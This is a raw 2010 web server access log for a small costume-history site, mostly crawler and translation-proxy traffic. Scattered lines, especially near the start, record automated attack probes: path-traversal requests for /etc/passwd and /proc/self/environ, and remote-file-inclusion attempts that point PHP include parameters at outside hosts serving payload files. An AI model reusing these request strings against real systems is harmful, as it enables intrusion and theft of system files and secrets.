124.217.229.185 - - [20/May/2010:05:32:39 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
124.217.229.185 - - [20/May/2010:05:32:48 -0500] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
222.231.60.209 - - [20/May/2010:05:33:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
38.101.148.126 - - [20/May/2010:05:34:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [20/May/2010:05:34:24 -0500] "GET /logs/access_log.1235865600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
76.12.147.249 - - [20/May/2010:05:35:03 -0500] "GET //LMS//doceboLms//class/class.dashboard_lms.php?where_framework=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:05:35:03 -0500] "GET /logs//LMS//doceboLms//class/class.dashboard_lms.php?where_framework=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:05:35:03 -0500] "GET /logs/access_log.1271548800//LMS//doceboLms//class/class.dashboard_lms.php?where_framework=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:05:35:18 -0500] "GET //LMS//doceboLms//class/class.dashboard_lms.php?where_framework=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:05:35:19 -0500] "GET /logs//LMS//doceboLms//class/class.dashboard_lms.php?where_framework=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
76.12.147.249 - - [20/May/2010:05:35:19 -0500] "GET /logs/access_log.1271548800//LMS//doceboLms//class/class.dashboard_lms.php?where_framework=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/P1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:05:37:28 -0500] "GET /costume/thmb3.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
222.231.60.209 - - [20/May/2010:05:40:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:05:42:59 -0500] "GET /logs/access_log.1237420800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.245.220.19 - - [20/May/2010:05:44:42 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:44:42 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:44:42 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 200 6278 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:44:44 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 200 6278 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:44:44 -0500] "GET /logs/access_log.1268956800%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:05:44:44 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:05:48:30 -0500] "GET /logs/access_log.1188172800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.142 - - [20/May/2010:05:51:34 -0500] "GET /logs/access_log.1241136000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.231.60.209 - - [20/May/2010:05:54:34 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:54:34 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:05:54:35 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.195.112.180 - - [20/May/2010:05:55:24 -0500] "GET /logs/access_log.1194739200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.45 - - [20/May/2010:05:56:05 -0500] "GET /logs/access_log.1245024000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:05:56:09 -0500] "GET /logs/access_log.1183593600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.26.60 - - [20/May/2010:06:01:23 -0500] "GET /phphtml.php?htmlclass_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:06:01:24 -0500] "GET /logs/phphtml.php?htmlclass_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
222.231.60.209 - - [20/May/2010:06:02:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:06:02:35 -0500] "GET /logs/access_log.1203984000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.87 - - [20/May/2010:06:07:05 -0500] "GET /logs/access_log.1234569600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:06:08:06 -0500] "GET /logs/access_log.1216080000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:06:13:51 -0500] "GET /logs/access_log.1209686400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/May/2010:06:14:52 -0500] "GET /logs/access_log.1225929600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.81.4.2 - - [20/May/2010:06:16:30 -0500] "GET //appserv/main.php?appserv_root=http://christenplein.com/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
208.81.4.2 - - [20/May/2010:06:16:30 -0500] "GET /logs/access_log.1266019200//appserv/main.php?appserv_root=http://christenplein.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
208.81.4.2 - - [20/May/2010:06:16:30 -0500] "GET /logs//appserv/main.php?appserv_root=http://christenplein.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
208.81.4.2 - - [20/May/2010:06:16:30 -0500] "GET /logs/access_log.1263772800//appserv/main.php?appserv_root=http://christenplein.com/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:06:19:27 -0500] "GET /logs/access_log.1186704000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.158.8 - - [20/May/2010:06:24:28 -0500] "GET /logs/index.php?option=com_powermail&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:06:24:28 -0500] "GET /index.php?option=com_powermail&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [20/May/2010:06:24:28 -0500] "GET /logs/index.php?option=com_powermail&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:06:24:29 -0500] "GET /index.php?option=com_powermail&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
87.250.255.243 - - [20/May/2010:06:24:58 -0500] "GET /logs/access_log.1197331200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
213.92.118.159 - - [20/May/2010:06:25:15 -0500] "GET /?sourcedir=http://christenplein.com/id1.txt? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:06:25:15 -0500] "GET /logs/access_log.1272240000/?sourcedir=http://christenplein.com/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:06:25:15 -0500] "GET /logs/?sourcedir=http://christenplein.com/id1.txt? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
64.251.10.117 - - [20/May/2010:06:27:25 -0500] "GET /logs/access_log.1271548800//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
64.251.10.117 - - [20/May/2010:06:27:26 -0500] "GET //poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
64.251.10.117 - - [20/May/2010:06:27:26 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://christenplein.com/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
38.101.148.126 - - [20/May/2010:06:31:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [20/May/2010:06:31:25 -0500] "GET /logs/access_log.1210550400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
211.180.203.200 - - [20/May/2010:06:31:29 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:06:31:39 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:06:32:29 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.180.203.200 - - [20/May/2010:06:33:00 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [20/May/2010:06:35:29 -0500] "GET /logs/access_log.1215648000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.125.75.17 - - [20/May/2010:06:37:00 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://translate.google.com.br/translate?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:37:01 -0500] "GET /costume/history5.gif HTTP/1.0" 200 4380 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhgUlml5gS_ocRar1Se2_1SPyAmmoA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:37:01 -0500] "GET /costume/enter1.gif HTTP/1.0" 200 22826 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhgUlml5gS_ocRar1Se2_1SPyAmmoA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:37:02 -0500] "GET /costume/costm_a.JPG HTTP/1.0" 200 61141 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhgUlml5gS_ocRar1Se2_1SPyAmmoA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:37:13 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume1.htm&rurl=translate.google.com.br&usg=ALkJrhgUlml5gS_ocRar1Se2_1SPyAmmoA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
184.73.24.169 - - [20/May/2010:06:37:43 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.24.169 - - [20/May/2010:06:37:43 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
74.125.75.17 - - [20/May/2010:06:37:49 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/costume2.htm&rurl=translate.google.com.br&usg=ALkJrhjESPquhO8sAwBIUYoTR5872CSrlQ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
184.73.24.169 - - [20/May/2010:06:37:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.24.169 - - [20/May/2010:06:37:57 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
74.125.75.17 - - [20/May/2010:06:38:00 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:38:01 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.0" 200 46065 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:01 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.0" 200 50590 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:01 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.0" 200 44353 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:02 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.0" 200 44973 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:03 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.0" 200 44129 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:03 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.0" 200 49320 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:03 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.0" 200 43100 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:03 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.0" 200 43767 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:04 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.0" 200 46554 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:04 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.0" 200 43366 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:04 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.0" 200 47583 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:06 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.0" 200 47369 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb1.htm&rurl=translate.google.com.br&usg=ALkJrhh60LywDHoOiCAuSFVgHy-8gu_2Bw""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:38:57 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/index1.htm&rurl=translate.google.com.br&usg=ALkJrhhDqSwmqGeFAzPPf8uXobzmYvqb3w""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
201.64.135.84 - - [20/May/2010:06:38:58 -0500] "GET /costume/015_JPG%20copy.jpg HTTP/1.0" 200 47836 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:58 -0500] "GET /costume/014_JPG%20copy.jpg HTTP/1.0" 200 50000 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:38:58 -0500] "GET /costume/013_JPG%20copy.jpg HTTP/1.0" 200 49391 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:00 -0500] "GET /costume/017_JPG%20copy.jpg HTTP/1.0" 200 45390 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:00 -0500] "GET /costume/019_JPG%20copy.jpg HTTP/1.0" 200 50528 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:00 -0500] "GET /costume/016_JPG%20copy.jpg HTTP/1.0" 200 43371 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:01 -0500] "GET /costume/020_JPG%20copy.jpg HTTP/1.0" 200 43734 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:01 -0500] "GET /costume/018_JPG%20copy.jpg HTTP/1.0" 200 46283 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:01 -0500] "GET /costume/021_JPG%20copy.jpg HTTP/1.0" 200 46071 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:02 -0500] "GET /costume/022_JPG%20copy.jpg HTTP/1.0" 200 44855 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:02 -0500] "GET /costume/024_JPG%20copy.jpg HTTP/1.0" 200 48964 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
201.64.135.84 - - [20/May/2010:06:39:02 -0500] "GET /costume/023_JPG%20copy.jpg HTTP/1.0" 200 49344 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
74.125.75.17 - - [20/May/2010:06:39:25 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "http://translate.googleusercontent.com/translate_c?hl=pt-BR&langpair=en%7Cpt&u=http://tomdolan.pconline.com/costume/thmb2.htm&rurl=translate.google.com.br&usg=ALkJrhiKK-dWN-Bo6OVLZ7Q9EVF-aZ9fpA""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2),gzip(gfe) (via translate.google.com)"
